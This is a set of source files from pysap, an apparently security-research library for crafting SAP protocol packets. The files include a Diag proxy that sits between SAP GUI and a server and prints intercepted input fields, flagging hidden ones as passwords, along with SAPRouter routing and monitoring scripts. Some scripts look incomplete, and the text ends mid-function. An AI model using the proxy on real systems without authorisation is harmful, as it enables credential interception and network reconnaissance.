#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNI, SAPNIProxyHandler, SAPNIProxy
from pysap.SAPDiag import SAPDiag, SAPDiagDP
from pysap.SAPDiagItems import *


# Bind the SAPDiag layer
bind_layers(SAPNI, SAPDiag,)
bind_layers(SAPNI, SAPDiagDP,)
bind_layers(SAPDiagDP, SAPDiag,)
bind_layers(SAPDiag, SAPDiagItem,)
bind_layers(SAPDiagItem, SAPDiagItem,)


# Set the verbosity to 0
conf.verb = 0


def filter_client(packet):
    atoms = []
    # Grab all the Atom items in the packet
    if SAPDiag in packet:
        atoms = packet[SAPDiag].get_item(["APPL", "APPL4"], "DYNT", "DYNT_ATOM")

    # Print the Atom items information
    if len(atoms) > 0:
        print("[*] Input fields:")
        for atom in [atom for atom_item in atoms for atom in atom_item.item_value.items]:
            if atom.etype in [121, 122, 123, 130, 131, 132]:
                text = atom.field1_text or atom.field2_text
                text = text.strip()
                if atom.attr_DIAG_BSD_INVISIBLE and len(text) > 0:
                    # If the invisible flag was set, we're probably
                    # dealing with a password field
                    print("[*]\tPassword field:\t%s" % (text))
                else:
                    print("[*]\tRegular field:\t%s" % (text))

    # Return the original packet
    return packet


def filter_server(packet):
    # Just return the original packet, server's data is not relevant
    # for this example
    return packet


class SAPDiagProxyHandler(SAPNIProxyHandler):
    """
    SAP Diag Proxy Handler

    Handles Diag packets and pass the data to filter functions
    """

    def process_client(self, packet):
        # Reprocess the messages using filter_client function
        packet = filter_client(packet)
        # Return the message
        return packet

    def process_server(self, packet):
        # Reprocess the packet using filter_server function
        packet = filter_server(packet)
        # Return the message
        return packet


# Command line options parser
def parse_options():

    description = \
    """This example script can be used to establish a proxy between a SAP GUI
    client and a SAP Netweaver Application Server and inspect the traffic via
    the filter_client and filter_server functions.

    The given example grabs input fields sent by the client.
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host",
                      help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int",
                      help="Remote port [%default]", default=3200)
    parser.add_option_group(target)

    local = OptionGroup(parser, "Local")
    local.add_option("-b", "--local-host", dest="local_host",
                     help="Local address [%default]", default="127.0.0.1")
    local.add_option("-l", "--local-port", dest="local_port", type="int",
                     help="Local port [%default]", default=3200)
    parser.add_option_group(local)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true",
                    default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Establishing a Diag proxy between %s:%d and remote %s:%d" % (options.local_host,
                                                                            options.local_port,
                                                                            options.remote_host,
                                                                            options.remote_port))
    proxy = SAPNIProxy(options.local_host, options.local_port,
                       options.remote_host, options.remote_port,
                       SAPDiagProxyHandler)
    while(True):
        proxy.handle_connection()


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("[*] Canceled by the user ...")
        exit(0)



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from socket import error as SocketError
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
# Custom imports
import pysap
from pysap.SAPMS import SAPMS
from pysap.SAPRouter import SAPRoutedStreamSocket


# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script connects with the Message Server service of a SAP
    Netweaver Application Server and monitors the clients to identify new
    application servers. Similar to SAP's msprot tool.

    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3900)
    target.add_option("--route-string", dest="route_string", help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-c", "--client", dest="client", default="pysap's-observer", help="Client name [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
                                              options.remote_port,
                                              options.route_string,
                                              base_cls=SAPMS)
    print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port))

    # Generate a random client string to differentiate our connection
    client_string = options.client

    # Send MS_LOGIN_2 packet
    print("[*] Sending login packet")
    p = SAPMS(flag=0x00, iflag=0x08, toname=client_string, fromname=client_string)
    response = conn.sr(p)[SAPMS]

    print("[*] Login performed, server string: %s" % response.fromname)
    server_string = response.fromname

    # Send MS_SERVER_CHG packet
    print("[*] Sending server change packet")
    p = SAPMS(flag=0x02, iflag=0x01, toname=server_string, fromname=client_string, opcode=0x01, opcode_version=4)
    response = conn.sr(p)[SAPMS]

    # Send MS_SERVER_LONG_LIST packet
    print("[*] Sending server long list packet")
    p = SAPMS(flag=0x01, iflag=0x01, toname=server_string, fromname=client_string, opcode=0x40, opcode_charset=0x00)
    conn.send(p)

    clients = []

    def print_client(msg, client):
        if options.verbose:
            print("[*] %s %s (host=%s, service=%s, port=%d)" % (msg,
                                                                client.client.strip(),
                                                                client.host.strip(),
                                                                client.service.strip(),
                                                                client.servno))

    # Send MS_SERVER_LST packet
    print("[*] Retrieving list of current clients")
    p = SAPMS(flag=0x02, iflag=0x01, toname=server_string, fromname=client_string, opcode=0x05, opcode_version=0x68)
    response = conn.sr(p)[SAPMS]
    for client in response.clients:
        if client.client != client_string:
            clients.append(("LIST", client))
            print_client("Client", client)

    try:
        while (True):
            response = conn.recv()[SAPMS]

            response.show()
            if response.opcode == 0x02:  # Added client
                client = response.clients[0]
                clients.append(("ADD", client))
                print_client("Added client", client)
            elif response.opcode == 0x03:  # Deleted client
                client = response.clients[0]
                clients.append(("DEL", client))
                print_client("Deleted client", client)
            elif response.opcode == 0x04:  # Modified client
                client = response.clients[0]
                clients.append(("MOD", client))
                print_client("Modified client", client)

    except SocketError:
        print("[*] Connection error")
    except KeyboardInterrupt:
        print("[*] Cancelled by the user")

    finally:
        print("[*] Observed clients:")
        for action, client in clients:
            print("\t%s\tclient %s (host=%s, service=%s, port=%d)" % (action,
                                                                      client.client.strip(),
                                                                      client.host.strip(),
                                                                      client.service.strip(),
                                                                      client.servno))

if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# External imports
from scapy.packet import Packet
from scapy.fields import StrFixedLenField
# Custom imports


class SAPSNCFrame(Packet):
    """SAP SNC Frame packet

    This packet is used just to contain SNC Frames.
    """
    name = "SAP SNC Frame"
    fields_desc = [
        StrFixedLenField("eye_catcher", "SNCFRAME")
    ]



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from socket import error as SocketError
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNIProxy, SAPNIProxyHandler, SAPNI, SAPNIStreamSocket
from pysap.SAPRouter import (SAPRouter, SAPRouterRouteHop, SAPRouteException,
                             router_is_error, router_is_pong)


# Bind the SAPRouter layer
bind_layers(SAPNI, SAPRouter, )

# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script routes a connection through a SAP Router service.

    Similar to Bizploit's 'saprouterNative', for more information check:
    * http://blog.onapsis.com/assessing-a-saprouters-security-with-onapsis-bizploit-part-i/
    * http://blog.onapsis.com/assessing-a-saprouters-security-with-onapsis-bizploit-part-ii/
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host [%default]", default="127.0.0.1")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3299)
    target.add_option("-t", "--target-host", dest="target_host", help="Target host to connect")
    target.add_option("-r", "--target-port", dest="target_port", type="int", help="Target port to connect")
    target.add_option("-P", "--target-pass", dest="target_pass", help="Target password")
    target.add_option("-a", "--local-host", dest="local_host", help="Local host to listen [%default]", default="127.0.0.1")
    target.add_option("-l", "--local-port", dest="local_port", type="int", help="Local port to listen [target-port]")
    target.add_option("--talk-mode", dest="talk_mode", help="Talk mode to use when requesting the route (raw or ni) [%default]", default="raw")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")
    if not options.target_host:
        parser.error("Target host to connect to is required")
    if not options.target_port:
        parser.error("Target port to connect to is required")
    options.talk_mode = options.talk_mode.lower()
    if options.talk_mode not in ["raw", "ni"]:
        parser.error("Invalid talk mode")

    if not options.local_port:
        print("[*] No local port specified, using target port %d" % options.target_port)
        options.local_port = options.target_port

    return options


class SAPRouterNativeRouterHandler(SAPNIProxyHandler):

    def __init__(self, client, server, options=None):
        self.options = options
        self.mtu = 2048
        super(SAPRouterNativeRouterHandler, self).__init__(client, server, options)

    def recv_send(self, local, remote, process):

        # Receive a native packet (not SAP NI)
        packet = local.ins.recv(self.mtu)
        logging.debug("SAPNIProxyHandler: Received %d native bytes", len(packet))

        # Handle close connection
        if len(packet) == 0:
            local.close()
            raise SocketError((100, "Underlying stream socket tore down"))

        # Send the packet to the remote peer
        remote.ins.sendall(packet)
        logging.debug("SAPNIProxyHandler: Sent %d native bytes", len(packet))


class SAPRouterNativeProxy(SAPNIProxy):

    def __init__(self, bind_address, bind_port, remote_address, remote_port,
                 handler, backlog=5, keep_alive=True, options=None):
        super(SAPRouterNativeProxy, self).__init__(bind_address, bind_port,
                                                   remote_address, remote_port,
                                                   handler, backlog, keep_alive,
                                                   options)
        self.route()

    def handle_connection(self):
        # Accept a client connection
        (client, __) = self.listener.ins.accept()

        # Creates a remote socket
        router = self.route()

        # Create the NI Stream Socket and handle it
        proxy = self.handler(SAPNIStreamSocket(client, self.keep_alive),
                             router,
                             self.options)
        return proxy

    def route(self):
        print("[*] Routing to %s:%d !" % (self.options.target_host,
                                          self.options.target_port))

        # Creates the connection with the SAP Router
        router = SAPNIStreamSocket.get_nisocket(self.options.remote_host,
                                                self.options.remote_port,
                                                keep_alive=self.keep_alive)

        # Build the Route request packet
        router_string = [SAPRouterRouteHop(hostname=self.options.remote_host,
                                           port=self.options.remote_port),
                         SAPRouterRouteHop(hostname=self.options.target_host,
                                           port=self.options.target_port,
                                           password=self.options.target_pass)]
        router_string_lens = list(map(len, list(map(str, router_string))))
        p = SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                      route_entries=len(router_string),
                      route_talk_mode=self.options.talk_mode,
                      route_rest_nodes=1,
                      route_length=sum(router_string_lens),
                      route_offset=router_string_lens[0],
                      route_string=router_string)

        if self.options.verbose:
            p.show2()

        # Send the request and grab the response
        response = router.sr(p)

        if SAPRouter in response:
            response = response[SAPRouter]
            if router_is_pong(response):
                print("[*] Route request accepted !")
                self.routed = True
            elif router_is_error(response) and response.return_code == -94:
                print("[*] Route request not accepted !")
                print(response.err_text_value)
                raise SAPRouteException("Route request not accepted")
            else:
                print("[*] Router send error")
                print(response.err_text_value)
                raise Exception("Router error: %s", response.err_text_value)
        else:
            print("[*] Wrong response received !")
            raise Exception("Wrong response received")

        return router


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Setting a proxy between %s:%d and remote SAP Router %s:%d (talk mode %s)" % (options.local_host,
                                                                                            options.local_port,
                                                                                            options.remote_host,
                                                                                            options.remote_port,
                                                                                            options.talk_mode))

    options.talk_mode = {"raw": 1,
                         "ni": 0}[options.talk_mode]

    proxy = SAPRouterNativeProxy(options.local_host, options.local_port,
                                 options.remote_host, options.remote_port,
                                 SAPRouterNativeRouterHandler,
                                 keep_alive=False,
                                 options=options)

    try:
        while (True):
            try:
                proxy.handle_connection()
            except SocketError as e:
                print("[*] Socket Error %s" % e)

    except KeyboardInterrupt:
        print("[*] Cancelled by the user !")
    except SAPRouteException as e:
        print("[*] Closing routing do to error %s" % e)


if __name__ == "__main__":
    main()



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
from os import path, makedirs, system
from setuptools import setup, Extension, Command
# Custom imports
import pysap


class APIDocumentationCommand(Command):
    """Custom command for building API documentation with epydoc.

    @requires: epydoc installed
    """

    description = "Builds the API documentation using epydoc"
    user_options = []
    target_dir = "./doc/"

    def initialize_options(self):
        pass

    def finalize_options(self):
        pass

    def run(self):
        """
        Runs epydoc
        """
        if not path.exists(self.target_dir):
            makedirs(self.target_dir)

        target = "pysap pysapcompress"
        system('epydoc --graph all --html --name "%s" --url "%s" -v -o %s %s -qq' % (pysap.__name__,
                                                                                     pysap.__url__,
                                                                                     self.target_dir,
                                                                                     target))


sapcompress = Extension('pysapcompress',
                        ['pysapcompress/pysapcompress.cpp',
                         'pysapcompress/vpa105CsObjInt.cpp',
                         'pysapcompress/vpa106cslzc.cpp',
                         'pysapcompress/vpa107cslzh.cpp',
                         'pysapcompress/vpa108csulzh.cpp'],
                        define_macros=[  # Enable this macro if you want some debugging information on the (de)compression functions
                                       #('DEBUG', None),
                                         # Enable this macro if you want detailed debugging information (hexdumps) on the (de)compression functions
                                       #('DEBUG_TRACE', None),
                        ])


setup(name=pysap.__title__,   # Package information
      version=pysap.__version__,
      author='Martin Gallo',
      author_email='mgallo@coresecurity.com',
      description='Python library for crafting SAP\'s network protocols packets',
      long_description=pysap.__doc__,  # @UndefinedVariable
      url=pysap.__url__,
      download_url=pysap.__url__,
      license=pysap.__license__,
      classifiers=['Development Status :: 3 - Alpha',
                   'Intended Audience :: Developers',
                   'Intended Audience :: Information Technology',
                   'Intended Audience :: System Administrators',
                   'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
                   'Programming Language :: Python',
                   'Programming Language :: C++',
                   'Topic :: Security'],
      # Packages list
      packages=['pysap'],
      provides=['pysapcompress', 'pysap'],

      # Extension module compilation
      ext_modules=[sapcompress],

      # Tests command
      test_suite='tests.suite',

      # API Documentation command
      cmdclass={'doc': APIDocumentationCommand},

      # Requirements
      install_requires=open('requirements.txt').read().splitlines(),

      # Optional requirements for some examples
      extras_require={"examples": open('requirements-optional.txt').read().splitlines()},
      )



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from socket import error as SocketError
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
# Custom imports
import pysap
from pysap.utils import BaseConsole
from pysap.SAPRFC import SAPRFC
from pysap.SAPRouter import SAPRoutedStreamSocket


# Set the verbosity to 0
conf.verb = 0


class SAPRFCMonitorConsole(BaseConsole):

    intro = "SAP Gateway/RFC Monitor Console"
    connection = None
    connected = False
    clients = []

    def __init__(self, options):
        super(SAPRFCMonitorConsole, self).__init__(options)
        self.runtimeoptions["client_string"] = self.options.client

    # Initialization
    def preloop(self):
        super(SAPRFCMonitorConsole, self).preloop()
        self.do_connect(None)
        self.do_client_list(None)

    # SAP Gateway/RFC Monitor commands

    def do_connect(self, args):
        """ Initiate the connection to the Gateway service. The connection is
        registered using the client_string runtime option. """

        # Create the socket connection
        try:
            self.connection = SAPRoutedStreamSocket.get_nisocket(self.options.remote_host,
                                                                 self.options.remote_port,
                                                                 self.options.route_string,
                                                                 base_cls=SAPRFC)
        except SocketError as e:
            self._error("Error connecting with the Gateway service")
            self._error(str(e))
            return

        self._print("Attached to %s / %d" % (self.options.remote_host, self.options.remote_port))

    def do_disconnect(self, args):
        """ Disconnects from the Gateway service. """

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        self.connection.close()
        self._print("Dettached from %s / %d ..." % (self.options.remote_host, self.options.remote_port))
        self.connected = False

    def do_exit(self, args):
        if self.connected:
            self.do_disconnect(None)
        return super(SAPRFCMonitorConsole, self).do_exit(args)

    def do_client_list(self, args):
        """ Retrieve the list of clients connected to the Gateway service.
        Use the client # value when required to provide a client IDs as
        parameter. """

        if not self.connected:
            self._error("You need to connect to the server first !")
            return


# Command line options parser
def parse_options():

    description = \
    """This script is an example implementation of SAP's Gateway Monitor
    program (gwmon). It allows the monitoring of a Gateway service and allows
    sending different commands and opcodes.

    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3300)
    target.add_option("--route-string", dest="route_string", help="Route string for connecting through a SAP Router")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-c", "--client", dest="client", default="pysap's-monitor", help="Client name [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    misc.add_option("--log-file", dest="logfile", help="Log file")
    misc.add_option("--console-log", dest="consolelog", help="Console log file")
    misc.add_option("--script", dest="script", help="Script file to run")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    rfc_console = SAPRFCMonitorConsole(options)

    try:
        if options.script:
            rfc_console.do_script(options.script)
        else:
            rfc_console.cmdloop()
    except KeyboardInterrupt:
        print("Cancelled by the user !")
        rfc_console.do_exit(None)


if __name__ == "__main__":
    main()



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import struct
from cmd import Cmd
from threading import Thread, Event
# External imports
from scapy.packet import Packet
from scapy.volatile import (RandEnum, RandomEnumeration, RandNum, RandTermString,
                            RandBin)
from scapy.fields import (ByteEnumField, ShortEnumField, MultiEnumField,
                          StrLenField, Field, StrFixedLenField, StrField)
# Optional imports
try:
    from tabulate import tabulate
except ImportError:
    tabulate = None


class PacketNoPadded(Packet):
    """Regular scapy packet with no padding.
    """
    def extract_padding(self, s):
        return '', s


class RandEnumKeys(RandEnum):
    """Picks a random value from dict keys list. Used for fuzzing enum fields.

    """
    def __init__(self, enum):
        self.enum = []
        for key in list(enum.keys()):
            self.enum.append(key)
        self.seq = RandomEnumeration(0, len(list(enum.keys())) - 1)

    def _fix(self):
        return self.enum[self.seq.next()]


class ByteEnumKeysField(ByteEnumField):
    """ByteEnumField that picks valid values when fuzzed.
    """
    def randval(self):
        return RandEnumKeys(self.i2s)


class ShortEnumKeysField(ShortEnumField):
    """ShortEnumField that picks valid values when fuzzed.
    """
    def randval(self):
        return RandEnumKeys(self.i2s)


class RandByteReduced(RandNum):
    """RandByte that only returns random values between 0 and x2a. Used while
    performing some fuzz to reduce the test cases space.

    """
    def __init__(self):
        RandNum.__init__(self, 0, 0x2a)


class ByteMultiEnumKeysField(MultiEnumField):
    """MultiEnumField that picks a reduced number of values. Used for fuzzing
    Byte fields with reduced number of values.

    """
    def randval(self):
        return RandByteReduced()


class MutablePacketField(StrLenField):
    """Packet field that mutates the class according to a list of evaluators.
    The evaluators are run against the packet and given to a class getter.

    If the class can't be found, the field is treated as a StrLenField.
    """
    def __init__(self, name, default, length_from, get_class, evaluators=None):
        """
        @param length_from: function to obtain the field length
        @type length_from: C{callable}

        @param get_class: function to obtain the class
        @type get_class: C{callable}

        @param evaluators: evaluators
        @type evaluators: C{list} of C{callable}
        """
        StrLenField.__init__(self, name, default, length_from=length_from)
        self.evaluators = evaluators or []
        self._get_class = get_class

    def get_class(self, pkt):
        # Run the evaluators on the actual packet
        values = [evaluator(pkt) for evaluator in self.evaluators]
        # Return the class using the function provided
        return self._get_class(pkt, *values)

    def i2m(self, pkt, i):
        cls = self.get_class(pkt)
        if cls is not None:
            return str(i)
        else:
            return StrLenField.i2m(self, pkt, i)

    def m2i(self, pkt, m):
        cls = self.get_class(pkt)
        if cls is not None:
            return cls(m)
        else:
            return StrLenField.m2i(self, pkt, m)


class StrNullFixedLenField(StrFixedLenField):
    """Packet field that has a fixed length and is null-terminated.
    """
    def __init__(self, name, default, length=None, length_from=None, max_length=None):
        self.max_length = max_length or 200
        StrFixedLenField.__init__(self, name, default, length=length, length_from=length_from)

    def i2repr(self, pkt, v):
        if type(v) is str:
            v = v.rstrip("\0")
        return repr(v)

    def getfield(self, pkt, s):
        l = self.length_from(pkt)
        return s[l + 1:], self.m2i(pkt, s[:l])

    def addfield(self, pkt, s, val):
        l = self.length_from(pkt)
        return s + struct.pack("%is" % l, self.i2m(pkt, val)) + "\x00"

    def randval(self):
        try:
            l = self.length_from(None)
        except:
            l = RandTermString(RandNum(0, self.max_length), "\x00")
        return RandBin(l)


class StrFixedLenPaddedField(StrFixedLenField):
    """Packet field that has a fixed length and is padded with a
    given character.
    """

    def __init__(self, name, default, length=None, length_from=None, padd=" "):
        StrFixedLenField.__init__(self, name, default, length, length_from)
        self.padd = padd

    def getfield(self, pkt, s):
        l = self.length_from(pkt)
        return s[l:], self.m2i(pkt, s[:l])

    def addfield(self, pkt, s, val):
        l = self.length_from(pkt)
        val += self.padd * l
        return StrFixedLenField.addfield(self, pkt, s, val)


class StrNullFixedLenPaddedField(StrFixedLenField):
    """Packet field that has a fixed length and is padded with a
    given character and null terminated.
    """

    def __init__(self, name, default, length=None, length_from=None, padd=" "):
        StrFixedLenField.__init__(self, name, default, length, length_from)
        self.padd = padd

    def getfield(self, pkt, s):
        l = self.length_from(pkt)
        lz = s.find("\x00")
        if lz < l:
            return s[l + 1:], self.m2i(pkt, s[:lz])
        return s[l + 1:], self.m2i(pkt, s[:l])

    def addfield(self, pkt, s, val):
        l = self.length_from(pkt)
        val += self.padd * l
        return StrFixedLenField.addfield(self, pkt, s, val)


class IntToStrField(Field):
    """Custom field from int to str values, with a variable length
    """

    def __init__(self, name, default, length=11):
        """Initialize the field with a variable length. The 'machine'
        representation is a string field and the 'internal' repr.
        is a numeric value.
        """
        Field.__init__(self, name, default, "%ds" % length)
        # Stores the length of the field
        self.length = length
        # Stores the conversion format between representations
        self.format = "%" + "%d" % length + "d"

    def m2i(self, pkt, x):
        return str(x)

    def i2m(self, pkt, x):
        return self.format % int(x)

    def i2count(self, pkt, x):
        return x


class SignedShortField(Field):
    def __init__(self, name, default):
        Field.__init__(self, name, default, "h")


class StrEncodedPaddedField(StrField):
    def __init__(self, name, default, encoding="utf-16", padd="\x0c",
                 fmt="H", remain=0):
        StrField.__init__(self, name, default, fmt, remain)
        self.encoding = encoding
        self.padd = padd

    def h2i(self, pkt, x):
        if x:
            x = x.encode(self.encoding)
        return x

    def i2h(self, pkt, x):
        if x:
            x = x.decode(self.encoding)
        return x

    def addfield(self, pkt, s, val):
        return s + self.i2m(pkt, val) + self.padd

    def getfield(self, pkt, s):
        l = s.find(self.padd)
        if l < 0:
            return "", s
        return s[l + 1:], self.m2i(pkt, s[:l])


class Worker(Thread):
    """Thread Worker

    It runs a function into a new thread.
    """

    def __init__(self, decoder, function):
        Thread.__init__(self)
        self.decoder = decoder
        self.function = function
        self.stopped = Event()

    def run(self):
        while not self.stopped.is_set():
            self.function()

    def stop(self):
        self.stopped.set()


# Base Console
class BaseConsole (Cmd, object):

    # Initialization
    def __init__(self, options):
        super(BaseConsole, self).__init__()
        self.prompt = "pysap's console>"
        self._hist = []
        self.options = options
        self.runtimeoptions = {}

    # Console Command definitions
    def do_history(self, args):
        """Show commands history."""
        self._print(self._hist)

    def do_exit(self, args):
        """Exit console."""
        return -1

    def do_help(self, args):
        """Show help."""
        super(BaseConsole, self).do_help(args)

    def do_options(self, args):
        """Show/set options."""
        # If no args, print the current options
        if not args:
            options_dict = vars(self.options)
            self._print("Configuration options:")
            for option, value in list(options_dict.items()):
                self._print("[" + option + "] = " + str(value))

            self._print("Run-time options:")
            for option in list(self.runtimeoptions.keys()):
                self._print("[" + option + "] = " + str(self.runtimeoptions[option]))
        # Set a run-time option
        else:
            args = args.split(" ", 1)
            if len(args) == 2:
                option = args.pop(0)  # Extract the option
                value = args.pop(0)
                if option in list(self.runtimeoptions.keys()):
                    self.runtimeoptions[option] = value
                else:
                    self._error("Invalid or non run-time option.")
            else:
                self._error("Invalid number of parameters.")
                self.do_help("options")

    def complete_options(self, text, line, begidx, endidx):
        if not text:     # Complete list of run-time options
            return list(self.runtimeoptions.keys())
        else:        # Options starting with text
            return [option for option in list(self.runtimeoptions.keys()) if option.startswith(text)]

    def do_script(self, args):
        """Runs a script file."""
        if not args:
            self._error("Invalid number of parameters.")
            self.do_help("script")
        else:
            try:
                scriptfile = open(args, 'r')
                for line in scriptfile:
                    if not line[0] in ["\n", "#"]:
                        self.precmd(line)
                        self.onecmd(line)
            except IOError:
                self._error("Error reading script file.")

    # Console output methods

    def _tabulate(self, table, **args):
        if tabulate:
            tabular = tabulate(table, args)
            self._print(tabular)
        else:
            self._print("\n".join("\t|".join(line) for line in table))

    def _print(self, string=""):
        print(str(string))
        self._log(string)

    def _log(self, string=""):
